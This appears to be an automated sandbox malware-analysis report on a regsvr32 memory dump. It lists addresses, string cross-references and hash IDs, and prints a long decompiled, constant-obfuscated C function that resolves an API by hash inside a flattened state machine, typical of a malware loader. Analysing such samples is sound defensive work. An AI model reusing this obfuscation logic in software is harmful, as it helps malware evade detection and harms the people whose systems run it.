0x003d1020
0x003d1025
0x003d102d
0x003d1035
0x003d103a
0x003d1042
0x003d104a
0x003d1052
0x003d1056
0x003d105e
0x003d1066
0x003d1073
0x003d1077
0x003d107f
0x003d1087
0x003d10a4
0x003d10a9
0x003d10b4
0x003d10be
0x003d10c8
0x003d10d0
0x003d10d8
0x003d10e6
0x003d10e9
0x003d10ed
0x003d10f5
0x003d10fa
0x003d1102
0x003d110a
0x003d1112
0x003d111a
0x003d1122
0x003d1127
0x003d1144
0x003d1149
0x003d115f
0x003d1163
0x003d116b
0x003d1173
0x003d117b
0x003d1183
0x003d118b
0x003d1190
0x003d1198
0x003d11a0
0x003d11a8
0x003d11c2
0x003d11c9
0x003d11db
0x003d11de
0x003d11e6
0x003d11ed
0x003d11f5
0x003d11fd
0x003d1205
0x003d120d
0x003d1215
0x003d1224
0x003d1226
0x003d1230
0x003d1234
0x003d1248
0x003d124d
0x003d1257
0x003d125c
0x003d126b
0x003d126d
0x003d1271
0x003d1279
0x003d1281
0x003d1287
0x003d128b
0x003d128f
0x003d1297
0x003d129f
0x003d12a7
0x003d12bb
0x003d12c0
0x003d12c4
0x003d165f
0x003d165f
0x003d1664
0x003d1669
0x003d166e
0x003d166e
0x00000000
0x003d1012
0x003d1006
0x003d0ffe
0x003d0ff6
0x003d0fea
0x003d0fde
0x003d0fd2
0x003d1d31
0x003d1d3b
0x003d1cbb
0x003d1cbb
0x00000000
0x003d1cc7
0x003d0fc1
0x003d0fbc

Strings

Jd, xrefs: 003D1281
`HS, xrefs: 003D17E3
*,, xrefs: 003D1A75
))w, xrefs: 003D17D5, 003D1877, 003D1790
3, xrefs: 003D1A29
))w, xrefs: 003D1880
G[}, xrefs: 003D159A
V, xrefs: 003D16AF
8G, xrefs: 003D11F5
v, xrefs: 003D0FAF
L_, xrefs: 003D1420
)l, xrefs: 003D17ED
JM, xrefs: 003D1A6D
^l[O, xrefs: 003D14DF

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )l$))w$))w$*,$G[}$JM$Jd$L_$V$^l[O$`HS$v$3$8G
API String ID: 0-305255752
Opcode ID: 2a48a462b03d5ac7ba7468080eb1f6fe9d44b5d7ec2b71a2d9c8df3221f62359
Instruction ID: de73ce9325b0845e6749bc68f73fc7890deb48f9b9083b3609eed1290f814e43
Opcode Fuzzy Hash: 2a48a462b03d5ac7ba7468080eb1f6fe9d44b5d7ec2b71a2d9c8df3221f62359
Instruction Fuzzy Hash: 97720EB25083429FC359CF25D58A80BBBE1BBD8748F108E1DF19696261D3B5CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003C7AB6 Relevance: 15.6, Strings: 12, Instructions: 645
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003C7AB6(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr* _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				void* _t673;
				void* _t681;
				signed int _t692;
				void* _t699;
				void* _t706;
				signed int _t718;
				signed int _t733;
				int _t740;
				void* _t745;
				void* _t751;
				signed int _t756;
				signed int _t757;
				signed int _t759;
				signed int _t764;
				signed int _t771;
				signed int _t773;
				signed int _t775;
				signed int _t783;
				signed int _t785;
				signed int _t787;
				signed int _t788;
				signed int _t791;
				signed int _t793;
				signed int _t798;
				signed int _t800;
				void* _t803;
				signed int _t831;
				signed int _t846;
				void* _t847;
				intOrPtr* _t850;
				void* _t852;
				signed int _t855;
				signed int* _t861;
				void* _t866;

				_t861 =  &_v336;
				_v304 = __edx;
				_t850 = __ecx;
				_t757 = _v304;
				_t673 = 0x94549;
				_t855 = _v304;
				_t846 = _v304;
				_v296 = 0xdfe65;
				_v300 = __ecx;
				_v292 = 0xc62c2;
				while(1) {
					L1:
					_t803 = 0x3de96;
					while(1) {
						L2:
						_t759 = _v308;
						while(1) {
							L3:
							_t866 = _t673 - _t803;
							if(_t866 > 0) {
								break;
							}
							if(_t866 == 0) {
								_v336 = 0xa8228f;
								_v336 = _v336 + 0xca97;
								_v336 = _v336 ^ 0x00a51674;
								_v328 = 0xf99c9c;
								_v328 = _v328 + 0x4ffe;
								_v328 = _v328 ^ 0x00ffba9f;
								_v332 = 0xbfc732;
								_v296 = _t759 + _t846;
								_v332 = _v332 * 0x5c;
								_v332 = _v332 << 5;
								_v332 = _v332 >> 0xa;
								_v332 = _v332 ^ 0x002fc895;
								_t699 = E003E0887(_v336, _v328, _v332, 0x3c1874);
								_v320 = 0x15e387;
								_v320 = _v320 * 0x3b;
								_v320 = _v320 ^ 0x05079e91;
								_v316 = 0x6f3a3;
								_t764 = 0x7f;
								_v316 = _v316 / _t764;
								_v316 = _v316 | 0xcc2e64f2;
								_v316 = _v316 ^ 0xcc282d06;
								_v324 = 0x9a2e10;
								_v324 = _v324 + 0xffffbcc6;
								_v324 = _v324 + 0x4fd5;
								_v324 = _v324 ^ 0x00951d6e;
								_v328 = 0xbce87a;
								_v328 = _v328 + 0xfba0;
								_v328 = _v328 ^ 0x00b7ac37;
								_v332 = 0x4c38b3;
								_v332 = _v332 >> 0xf;
								_v332 = _v332 | 0xb40d5386;
								_v332 = _v332 * 0x24;
								_v332 = _v332 ^ 0x51d5da51;
								_v336 = 0x6e5613;
								_v336 = _v336 ^ 0x69451f32;
								_v336 = _v336 ^ 0xd57cc932;
								_v336 = _v336 ^ 0xbc5665c1;
								_t706 = E003CD73D(_v316, __eflags,  &_v128, _t759 + _t846 - _v308, _v308, _v324, _t699, _v328, _v332, _v336,  &_v288,  &_v256);
								_v328 = 0xfd5d44;
								_v328 = _v328 + 0xffff3d87;
								_v328 = _v328 ^ 0x00f84d82;
								_t855 = _t706 + _v308;
								_v324 = 0x6451fc;
								_v324 = _v324 + 0xffff1c0e;
								_v324 = _v324 + 0x7b0d;
								_v324 = _v324 ^ 0x00673b47;
								_v336 = 0x8a5a99;
								_v336 = _v336 + 0xfd2c;
								_v336 = _v336 | 0x9e38d24e;
								_v336 = _v336 ^ 0x9eb16e6c;
								E003C43D3(_v328, _v324, _v336, _t699);
								_t861 =  &(_t861[0xe]);
								_t673 = 0xe509a;
								goto L14;
							} else {
								if(_t673 == 0x5f35) {
									_v324 = 0x7c18d0;
									_v324 = _v324 | 0x491a8915;
									_v324 = _v324 ^ 0x4973e944;
									_v328 = 0x1b521f;
									_v328 = _v328 >> 0x10;
									_v328 = _v328 ^ 0x000d549f;
									_v332 = 0x948d30;
									_v332 = _v332 << 0x10;
									_v332 = _v332 + 0xffffa903;
									_v332 = _v332 | 0x420870f7;
									_v332 = _v332 ^ 0xcf2a57c1;
									_v336 = 0xca7fd3;
									_v336 = _v336 + 0xd793;
									_v336 = _v336 | 0x1b0d4f04;
									_v336 = _v336 ^ 0x1bcd0599;
									E003C79D0(_v324, _v328, __eflags, _v332, _t757, _v336);
									_t757 = 0;
									__eflags = 0;
								} else {
									if(_t673 == 0xbb71) {
										_t846 = _t846 +  *((intOrPtr*)(_t850 + 4));
										_v324 = 0xd6d67;
										_v324 = _v324 | 0xb47008eb;
										_v324 = _v324 ^ 0xb4729545;
										_v336 = 0x943d3;
										_v336 = _v336 << 7;
										_v336 = _v336 ^ 0x04ad8961;
										_v328 = 0xe4c3cf;
										_v328 = _v328 + 0x6d09;
										_v328 = _v328 ^ 0x00e63c86;
										_push(_t759);
										_push(_t759);
										_t759 = E003C8D52(_t759, _t846, __eflags);
										_t803 = 0x3de96;
										__eflags = _t759;
										_v308 = _t759;
										_t673 =  !=  ? 0x3de96 : 0x5f35;
										continue;
									} else {
										if(_t673 == 0x15625) {
											_v320 = 0xb09aff;
											_v320 = _v320 << 6;
											_v320 = _v320 + 0xffff1d2a;
											_t771 = 0x79;
											_push(_t771);
											_v320 = _v320 / _t771;
											_v320 = _v320 ^ 0x005d6760;
											_v332 = 0x8741ee;
											_v332 = _v332 << 4;
											_v332 = _v332 ^ 0x37f8d569;
											_v332 = _v332 + 0x97bb;
											_v332 = _v332 ^ 0x3f8d634c;
											_v336 = 0x91a733;
											_v336 = _v336 >> 0xe;
											_v336 = _v336 ^ 0x00099672;
											_v328 = 0x7fbb6;
											_v328 = _v328 ^ 0x6516ebf7;
											_v328 = _v328 ^ 0x6510e3fa;
											_t718 = E003C2B6C(_v320, _v332);
											_v316 = 0x4e42d5;
											_t846 = _t718;
											_v316 = _v316 << 7;
											_v316 = _v316 ^ 0x2722f0fc;
											_v328 = 0x646ee0;
											_v328 = _v328 >> 4;
											_v328 = _v328 ^ 0x00037947;
											_v336 = 0x8171ac;
											_v336 = _v336 + 0xfffff5a7;
											_v336 = _v336 ^ 0x922d2e6f;
											_v336 = _v336 ^ 0x92a6a68a;
											_v332 = 0xd1fb70;
											_v332 = _v332 | 0x45a6095e;
											_v332 = _v332 << 0xf;
											_v332 = _v332 | 0x7c71097c;
											_v332 = _v332 ^ 0xfdf0f4f6;
											_v324 = 0xee1fc7;
											_t773 = 0x28;
											_v324 = _v324 / _t773;
											_v324 = _v324 ^ 0x0005f3f6;
											_v320 = 0x51a5d3;
											_v320 = _v320 * 0x5e;
											_v320 = _v320 ^ 0x98c83aa8;
											_v320 = _v320 + 0x5316;
											_v320 = _v320 ^ 0x85332ce9;
											E003CAF67(_v316, _v320 | _v324,  &_v288, _v328, _t846, _v336, _v332);
											_t861 =  &(_t861[7]);
											_t673 = 0xfdb55;
											while(1) {
												L1:
												_t803 = 0x3de96;
												goto L2;
											}
										} else {
											if(_t673 == 0x1b4ea) {
												_v312 = 0x7f1cae;
												_t852 =  &_v256;
												_v312 = _v312 + 0x57e8;
												_v312 = _v312 | 0xa4d000ae;
												_v312 = _v312 ^ 0xa4ff74b6;
												_v320 = 0x58989f;
												_v320 = _v320 ^ 0x7be83bb1;
												_v320 = _v320 + 0xffff083e;
												_v320 = _v320 ^ 0x7bafab7c;
												_v336 = 0xa5ec8b;
												_v336 = _v336 >> 8;
												_v336 = _v336 ^ 0x000951ab;
												_v332 = 0x95629;
												_v332 = _v332 << 5;
												_t775 = 0x49;
												_push(_t775);
												_v332 = _v332 / _t775;
												_v332 = _v332 ^ 0x0009fc9e;
												_t831 = E003C2B6C(_v312, _v320);
												_pop(0);
												__eflags = _t831;
												if(_t831 != 0) {
													_t847 = _t852;
													_t783 = _t831 >> 1;
													__eflags = _t783;
													_t852 = _t852 + _t831 * 2;
													_t740 = memset(_t847, 0x2d002d, _t783 << 2);
													asm("adc ecx, ecx");
													memset(_t847 + _t783, _t740, 0);
													_t861 =  &(_t861[6]);
												}
												_v316 = 0x8136d8;
												_v316 = _v316 << 3;
												_v316 = _v316 ^ 0x0409b6c8;
												_v332 = 0x593818;
												_v332 = _v332 + 0xb8ae;
												_push(0);
												_v332 = _v332 * 0x6e;
												_v332 = _v332 ^ 0x26a57504;
												_v324 = 0x69eac;
												_v324 = _v324 << 3;
												_v324 = _v324 ^ 0x003c2357;
												_v336 = 0x732a6b;
												_v336 = _v336 * 0x5c;
												_v336 = _v336 ^ 0x29661e81;
												_t733 = E003C2B6C(_v316, _v332);
												_v336 = 0x85d37d;
												_t846 = _t733;
												_v336 = _v336 << 3;
												_v336 = _v336 | 0xb3d2ea65;
												_v336 = _v336 ^ 0xb7f23a29;
												_v320 = 0x4f5bc2;
												_v320 = _v320 * 0x58;
												_v320 = _v320 + 0xffff76fe;
												_v320 = _v320 | 0xcb28b71d;
												_v320 = _v320 ^ 0xdb680df4;
												_v312 = 0xbb54aa;
												_v312 = _v312 + 0xbcfc;
												_v312 = _v312 * 0x79;
												_v312 = _v312 * 0x66;
												_v312 = _v312 ^ 0x6afc491f;
												_v316 = 0xa28aeb;
												_v316 = _v316 >> 0x10;
												_v316 = _v316 << 2;
												_v316 = _v316 ^ 0x000a22a3;
												_v328 = 0x38cf02;
												_v328 = _v328 * 0x69;
												_v328 = _v328 ^ 0x174ce7da;
												_v324 = 0x7f02e5;
												_v324 = _v324 << 0xc;
												_v324 = _v324 ^ 0xee2d33ab;
												_v324 = _v324 ^ 0x1e0363aa;
												_v332 = 0xc5fed8;
												_v332 = _v332 << 5;
												_v332 = _v332 * 0x45;
												_v332 = _v332 + 0xffffa572;
												_v332 = _v332 ^ 0xabb5ac70;
												__eflags = _v332 | _v324 | _v328;
												E003CAF67(_v336, _v332 | _v324 | _v328, _t852, _v320, _t846, _v312, _v316);
												_t861 =  &(_t861[7]);
												_t673 = 0x5c7cf;
												L14:
												_t850 = _v300;
												while(1) {
													L1:
													_t803 = 0x3de96;
													goto L2;
												}
											} else {
												_t871 = _t673 - 0x2c3c7;
												if(_t673 != 0x2c3c7) {
													L30:
													__eflags = _t673 - 0x6a214;
													if(__eflags != 0) {
														L2:
														_t759 = _v308;
														continue;
													}
												} else {
													_v328 = 0x90677e;
													_v328 = _v328 ^ 0xd5f0e05c;
													_v328 = _v328 ^ 0xd56fcb1c;
													_v336 = 0x818e02;
													_t785 = 0x63;
													_v336 = _v336 / _t785;
													_v336 = _v336 | 0x84e84f75;
													_v336 = _v336 ^ 0x84e1360e;
													_v332 = 0x58aecc;
													_v332 = _v332 * 0x19;
													_v332 = _v332 ^ 0xc65ccabc;
													_v332 = _v332 ^ 0x6e265d57;
													_v332 = _v332 ^ 0xa0d0da5c;
													_t745 = E003E0887(_v328, _v336, _v332, 0x3c1794);
													_v324 = 0xa40d32;
													_v324 = _v324 | 0xfb66c288;
													_v324 = _v324 ^ 0x8a18ec3f;
													_v324 = _v324 ^ 0x71f9920d;
													_v336 = 0x90413b;
													_t787 = 0x5d;
													_v336 = _v336 / _t787;
													_t788 = 0x1b;
													_v336 = _v336 / _t788;
													_v336 = _v336 ^ 0x00066740;
													_v328 = 0x247722;
													_v328 = _v328 + 0x5237;
													_v328 = _v328 ^ 0x00235f27;
													_t66 =  &_v328; // 0x235f27
													_t751 = E003D510C(_v324, _t871, _v336,  &_v256, _t745, _t855,  *_t66);
													_v324 = 0x26b1f1;
													_v324 = _v324 ^ 0xd7a72a65;
													_t791 = 0x6e;
													_v324 = _v324 / _t791;
													_v324 = _v324 ^ 0x01f80687;
													_v332 = 0x867494;
													_v332 = _v332 + 0xa885;
													_v332 = _v332 * 0x18;
													_v332 = _v332 + 0xffff2e15;
													_v332 = _v332 ^ 0x0cacb554;
													_v336 = 0x72990;
													_v336 = _v336 | 0x0b4024ad;
													_v336 = _v336 ^ 0x408ddf55;
													_v336 = _v336 ^ 0x4bcd972b;
													E003C43D3(_v324, _v332, _v336, _t745);
													_t793 = _v304;
													_t756 = _v308;
													 *_t793 = _t756;
													 *((intOrPtr*)(_t793 + 4)) = _t855 + _t751 - _t756;
												}
											}
										}
									}
								}
							}
							L33:
							return _t757;
						}
						__eflags = _t673 - 0x5c7cf;
						if(__eflags == 0) {
							_v332 = 0x7143ea;
							_v332 = _v332 + 0x14e3;
							_v332 = _v332 << 3;
							_v332 = _v332 + 0xffff3465;
							_v332 = _v332 ^ 0x0389bacd;
							_t846 = _v332;
							_v324 = 0xee0db9;
							_v324 = _v324 + 0xed4d;
							_v324 = _v324 ^ 0x00ecb6a0;
							_v336 = 0x387d33;
							_v336 = _v336 >> 6;
							_push(_t759);
							_push(_t759);
							_v336 = _v336 * 0x27;
							_v336 = _v336 ^ 0x002536c4;
							_v328 = 0x7b4968;
							_v328 = _v328 + 0xaa9c;
							_v328 = _v328 ^ 0x007c9629;
							_t757 = E003C8D52(_t759, _t846, __eflags);
							__eflags = _t757;
							if(__eflags == 0) {
								_t673 = 0x6a214;
								_t803 = 0x3de96;
								goto L30;
							} else {
								_t673 = 0x9f68a;
								goto L1;
							}
						} else {
							__eflags = _t673 - 0x94549;
							if(__eflags == 0) {
								_t673 = 0x15625;
								goto L3;
							} else {
								__eflags = _t673 - 0x9f68a;
								if(_t673 == 0x9f68a) {
									_v316 = 0xcb1083;
									_v316 = _v316 ^ 0x6a4bc1ba;
									_v316 = _v316 ^ 0x6a87c8b7;
									_v336 = 0xde99d0;
									_v336 = _v336 * 0x15;
									_v336 = _v336 << 3;
									_v336 = _v336 ^ 0x921cb6d4;
									_v324 = 0xd1be7e;
									_v324 = _v324 + 0xffff3491;
									_v324 = _v324 ^ 0x00deb6da;
									_v328 = 0x5da0a;
									_v328 = _v328 + 0x7ab2;
									_v328 = _v328 ^ 0x0003e5d9;
									_t681 = E003CD933(_v316, _v336, 0x3c1814, _v324, _v328);
									_push( &_v256);
									_push(_t681);
									_push(_t846);
									_push(_t757);
									 *((intOrPtr*)(E003CAE46(0xa56d57e4, 0xcc)))();
									_v336 = 0xe4f0e3;
									_v336 = _v336 ^ 0x6afef73d;
									_v336 = _v336 + 0xffff46a4;
									_v336 = _v336 ^ 0x6a130d61;
									_v332 = 0x56d0f;
									_v332 = _v332 << 0xd;
									_v332 = _v332 ^ 0x96174440;
									_v332 = _v332 << 0xb;
									_v332 = _v332 ^ 0xb5242bf4;
									_v328 = 0x9692ba;
									_v328 = _v328 + 0xfe3c;
									_v328 = _v328 ^ 0x0095be28;
									E003C43D3(_v336, _v332, _v328, _t681);
									_t861 =  &(_t861[9]);
									_t673 = 0xbb71;
									goto L14;
								} else {
									__eflags = _t673 - 0xe509a;
									if(_t673 == 0xe509a) {
										_v324 = 0xb2b947;
										_v324 = _v324 ^ 0xbcadebfb;
										_v324 = _v324 * 0x12;
										_v324 = _v324 ^ 0x3a3e83b7;
										_v336 = 0xb60345;
										_v336 = _v336 + 0x7d90;
										_v336 = _v336 << 3;
										_v336 = _v336 ^ 0x05b5c14d;
										_v316 = 0x8f47c5;
										_v316 = _v316 << 0xc;
										_v316 = _v316 ^ 0xf478dba7;
										_v328 = 0x9bcdd6;
										_v328 = _v328 >> 0xa;
										_v328 = _v328 ^ 0x00057d5d;
										E003DF4FB(_v324,  *_t850, _v336, _t855, _v316,  *((intOrPtr*)(_t850 + 4)), _v328);
										_t861 =  &(_t861[5]);
										_t673 = 0x2c3c7;
										_t855 = _t855 +  *((intOrPtr*)(_t850 + 4));
										while(1) {
											L1:
											_t803 = 0x3de96;
											goto L2;
										}
									} else {
										__eflags = _t673 - 0xfdb55;
										if(_t673 != 0xfdb55) {
											goto L30;
										} else {
											_v336 = 0x64a249;
											_v336 = _v336 << 0xe;
											_v336 = _v336 | 0x5e81248e;
											_v336 = _v336 ^ 0x7e93648a;
											_v328 = 0x71284e;
											_t443 =  &_v328; // 0x71284e
											_t798 = 0x7b;
											_push(_t798);
											_v328 =  *_t443 / _t798;
											_v328 = _v328 ^ 0x0000eb93;
											_v320 = 0xe1baec;
											_v320 = _v320 + 0xffff23ae;
											_v320 = _v320 + 0x3940;
											_v320 = _v320 + 0xffff8dc5;
											_v320 = _v320 ^ 0x00eea60c;
											_v332 = 0x377a43;
											_v332 = _v332 | 0x2e80c4fb;
											_v332 = _v332 << 0x10;
											_v332 = _v332 ^ 0x436ab84a;
											_v332 = _v332 ^ 0xbd96a621;
											_t692 = E003C2B6C(_v336, _v328);
											_v324 = 0x6d99af;
											_t846 = _t692;
											_v324 = _v324 + 0xfffff871;
											_v324 = _v324 | 0x22134919;
											_v324 = _v324 ^ 0x227e52cb;
											_v316 = 0x120cbe;
											_v316 = _v316 + 0xf57d;
											_v316 = _v316 ^ 0x001e6e55;
											_v328 = 0x9a475;
											_t800 = 0x1c;
											_v328 = _v328 / _t800;
											_v328 = _v328 ^ 0x000340fe;
											_v332 = 0xa13a00;
											_v332 = _v332 << 0xf;
											_v332 = _v332 ^ 0xf86dc36e;
											_v332 = _v332 + 0xffffa1bf;
											_v332 = _v332 ^ 0x65683922;
											_v320 = 0xe368f7;
											_v320 = _v320 * 0x41;
											_v320 = _v320 + 0xffff641d;
											_v320 = _v320 + 0xffff88bf;
											_v320 = _v320 ^ 0x39bc939b;
											_v312 = 0xd6276f;
											_v312 = _v312 | 0x9e77feec;
											_v312 = _v312 ^ 0x9ef7ffee;
											_v336 = 0x5874a8;
											_v336 = _v336 + 0xffff591d;
											_v336 = _v336 | 0xf35d2f46;
											_v336 = _v336 ^ 0xf35fefc5;
											E003CAF67(_v324, _v336 | _v312 | _v320,  &_v128, _v316, _t846, _v328, _v332);
											_t861 =  &(_t861[7]);
											_t673 = 0x1b4ea;
											while(1) {
												L1:
												_t803 = 0x3de96;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x003c7ab6
0x003c7abf
0x003c7ac3
0x003c7ac5
0x003c7ac9
0x003c7ace
0x003c7ad3
0x003c7ad7
0x003c7adf
0x003c7ae3
0x003c7aeb
0x003c7aeb
0x003c7aeb
0x003c7af0
0x003c7af0
0x003c7af0
0x003c7af4
0x003c7af4
0x003c7af4
0x003c7af6
0x00000000
0x00000000
0x003c7afc
0x003c8114
0x003c811f
0x003c8127
0x003c812f
0x003c8137
0x003c813f
0x003c8147
0x003c8159
0x003c815d
0x003c8161
0x003c8166
0x003c816b
0x003c817f
0x003c8184
0x003c8197
0x003c819b
0x003c81a3
0x003c81af
0x003c81b8
0x003c81bc
0x003c81c4
0x003c81cc
0x003c81d4
0x003c81dc
0x003c81e4
0x003c81ec
0x003c81f4
0x003c81fc
0x003c8204
0x003c820c
0x003c8211
0x003c821e
0x003c8226
0x003c822e
0x003c8236
0x003c823e
0x003c8246
0x003c8277
0x003c827c
0x003c8286
0x003c828e
0x003c8296
0x003c829a
0x003c82a2
0x003c82aa
0x003c82b2
0x003c82ba
0x003c82c2
0x003c82ca
0x003c82d2
0x003c82e7
0x003c82ec
0x003c82ef
0x00000000
0x003c7b02
0x003c7b07
0x003c8752
0x003c875a
0x003c8762
0x003c876a
0x003c8772
0x003c8777
0x003c877f
0x003c8787
0x003c878c
0x003c8794
0x003c879c
0x003c87a4
0x003c87ac
0x003c87b4
0x003c87bc
0x003c87d5
0x003c87dd
0x003c87dd
0x003c7b0d
0x003c7b12
0x003c809b
0x003c809e
0x003c80a8
0x003c80b0
0x003c80b8
0x003c80c0
0x003c80c5
0x003c80cd
0x003c80d5
0x003c80dd
0x003c80f1
0x003c80f2
0x003c80fa
0x003c80fc
0x003c8101
0x003c8103
0x003c810c
0x00000000
0x003c7b18
0x003c7b1d
0x003c7f1e
0x003c7f28
0x003c7f2d
0x003c7f3b
0x003c7f3e
0x003c7f3f
0x003c7f43
0x003c7f4b
0x003c7f53
0x003c7f58
0x003c7f60
0x003c7f68
0x003c7f70
0x003c7f78
0x003c7f7d
0x003c7f85
0x003c7f8d
0x003c7f95
0x003c7fad
0x003c7fb2
0x003c7fba
0x003c7fbc
0x003c7fc3
0x003c7fcb
0x003c7fd3
0x003c7fd8
0x003c7fe0
0x003c7fe8
0x003c7ff0
0x003c7ff8
0x003c8000
0x003c8008
0x003c8010
0x003c8015
0x003c801d
0x003c8025
0x003c8033
0x003c8036
0x003c803a
0x003c8042
0x003c804f
0x003c8057
0x003c805f
0x003c8067
0x003c8089
0x003c808e
0x003c8091
0x003c7aeb
0x003c7aeb
0x003c7aeb
0x00000000
0x003c7aeb
0x003c7b23
0x003c7b28
0x003c7cd8
0x003c7ce0
0x003c7ce4
0x003c7cee
0x003c7cf6
0x003c7cfe
0x003c7d06
0x003c7d0e
0x003c7d16
0x003c7d1e
0x003c7d26
0x003c7d2b
0x003c7d33
0x003c7d3b
0x003c7d46
0x003c7d49
0x003c7d4a
0x003c7d4e
0x003c7d6b
0x003c7d6e
0x003c7d6f
0x003c7d71
0x003c7d75
0x003c7d77
0x003c7d77
0x003c7d79
0x003c7d81
0x003c7d83
0x003c7d85
0x003c7d85
0x003c7d85
0x003c7d88
0x003c7d90
0x003c7d95
0x003c7d9d
0x003c7da5
0x003c7db2
0x003c7db3
0x003c7db7
0x003c7dbf
0x003c7dc7
0x003c7dcc
0x003c7dd4
0x003c7de1
0x003c7de5
0x003c7dfd
0x003c7e02
0x003c7e0a
0x003c7e0c
0x003c7e11
0x003c7e19
0x003c7e21
0x003c7e2e
0x003c7e32
0x003c7e3a
0x003c7e42
0x003c7e4a
0x003c7e52
0x003c7e5f
0x003c7e68
0x003c7e6c
0x003c7e74
0x003c7e7c
0x003c7e81
0x003c7e86
0x003c7e8e
0x003c7e9b
0x003c7e9f
0x003c7ea7
0x003c7eaf
0x003c7eb4
0x003c7ebc
0x003c7ec4
0x003c7ecc
0x003c7ed6
0x003c7eda
0x003c7ee2
0x003c7eff
0x003c7f08
0x003c7f0d
0x003c7f10
0x003c7f15
0x003c7f15
0x003c7aeb
0x003c7aeb
0x003c7aeb
0x00000000
0x003c7aeb
0x003c7b2e
0x003c7b2e
0x003c7b33
0x003c8742
0x003c8742
0x003c8747
0x003c7af0
0x003c7af0
0x00000000
0x003c7af0
0x003c7b39
0x003c7b39
0x003c7b43
0x003c7b4b
0x003c7b53
0x003c7b61
0x003c7b69
0x003c7b6d
0x003c7b75
0x003c7b7d
0x003c7b8a
0x003c7b8e
0x003c7b96
0x003c7b9e
0x003c7bb2
0x003c7bb7
0x003c7bc1
0x003c7bcb
0x003c7bd3
0x003c7bdb
0x003c7be9
0x003c7bee
0x003c7bf8
0x003c7bff
0x003c7c05
0x003c7c11
0x003c7c19
0x003c7c21
0x003c7c29
0x003c7c38
0x003c7c3d
0x003c7c47
0x003c7c57
0x003c7c5b
0x003c7c5f
0x003c7c67
0x003c7c6f
0x003c7c7c
0x003c7c80
0x003c7c88
0x003c7c90
0x003c7c98
0x003c7ca0
0x003c7ca8
0x003c7cbc
0x003c7cc4
0x003c7cc8
0x003c7cce
0x003c7cd0
0x003c7cd0
0x003c7b33
0x003c7b28
0x003c7b1d
0x003c7b12
0x003c7b07
0x003c87e2
0x003c87eb
0x003c87eb
0x003c82f9
0x003c82fe
0x003c869a
0x003c86a2
0x003c86aa
0x003c86af
0x003c86b7
0x003c86bf
0x003c86c5
0x003c86cd
0x003c86d5
0x003c86dd
0x003c86e5
0x003c86ef
0x003c86f0
0x003c86f1
0x003c86f5
0x003c86fd
0x003c8705
0x003c870d
0x003c8726
0x003c872a
0x003c872c
0x003c8738
0x003c873d
0x00000000
0x003c872e
0x003c872e
0x00000000
0x003c872e
0x003c8304
0x003c8304
0x003c8309
0x003c8690
0x00000000
0x003c830f
0x003c830f
0x003c8314
0x003c8578
0x003c8580
0x003c8588
0x003c8590
0x003c859d
0x003c85a1
0x003c85a6
0x003c85ae
0x003c85b6
0x003c85be
0x003c85c6
0x003c85ce
0x003c85d6
0x003c85f3
0x003c8606
0x003c8607
0x003c8608
0x003c8609
0x003c8615
0x003c8617
0x003c861f
0x003c8627
0x003c862f
0x003c8637
0x003c863f
0x003c8644
0x003c864c
0x003c8651
0x003c8659
0x003c8661
0x003c8669
0x003c867e
0x003c8683
0x003c8686
0x00000000
0x003c831a
0x003c831a
0x003c831f
0x003c84e5
0x003c84ed
0x003c84fa
0x003c84fe
0x003c8506
0x003c850e
0x003c8516
0x003c851b
0x003c8523
0x003c852b
0x003c8530
0x003c8538
0x003c8540
0x003c8545
0x003c8563
0x003c8568
0x003c856b
0x003c8570
0x003c7aeb
0x003c7aeb
0x003c7aeb
0x00000000
0x003c7aeb
0x003c8325
0x003c8325
0x003c832a
0x00000000
0x003c8330
0x003c8330
0x003c833a
0x003c833f
0x003c8347
0x003c834f
0x003c8357
0x003c835d
0x003c8360
0x003c8361
0x003c8365
0x003c836d
0x003c8375
0x003c837d
0x003c8385
0x003c838d
0x003c8395
0x003c839d
0x003c83a5
0x003c83aa
0x003c83b2
0x003c83ca
0x003c83cf
0x003c83d7
0x003c83d9
0x003c83e3
0x003c83eb
0x003c83f3
0x003c83fb
0x003c8403
0x003c840b
0x003c8419
0x003c841c
0x003c8420
0x003c8428
0x003c8430
0x003c8435
0x003c843d
0x003c8445
0x003c844d
0x003c845a
0x003c8465
0x003c846d
0x003c8475
0x003c847d
0x003c8485
0x003c848d
0x003c8495
0x003c849d
0x003c84a5
0x003c84ad
0x003c84d3
0x003c84d8
0x003c84db
0x003c7aeb
0x003c7aeb
0x003c7aeb
0x00000000
0x003c7aeb
0x003c7aeb
0x003c832a
0x003c831f
0x003c8314
0x003c8309
0x00000000
0x003c82fe
0x003c7af0

Strings

Cq, xrefs: 003C869A
IE, xrefs: 003C8304
W, xrefs: 003C7CE4
N(q, xrefs: 003C8357
IE, xrefs: 003C7AC9
@9, xrefs: 003C837D
DsI, xrefs: 003C8762
`g], xrefs: 003C7F43
G;g, xrefs: 003C82B2
3}8, xrefs: 003C86DD
'_#, xrefs: 003C7C29
W]&n, xrefs: 003C7B96

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '_#$3}8$@9$DsI$G;g$IE$IE$N(q$W]&n$`g]$Cq$W
API String ID: 0-1526085021
Opcode ID: b22e489dc8e1fa89075f72e02e4714fbceeb7a2da744dafd0dade8df8c5b5272
Instruction ID: e3596ee6aead695c2c7c52158b562f588d049cc036b95911a3695f819f35a552
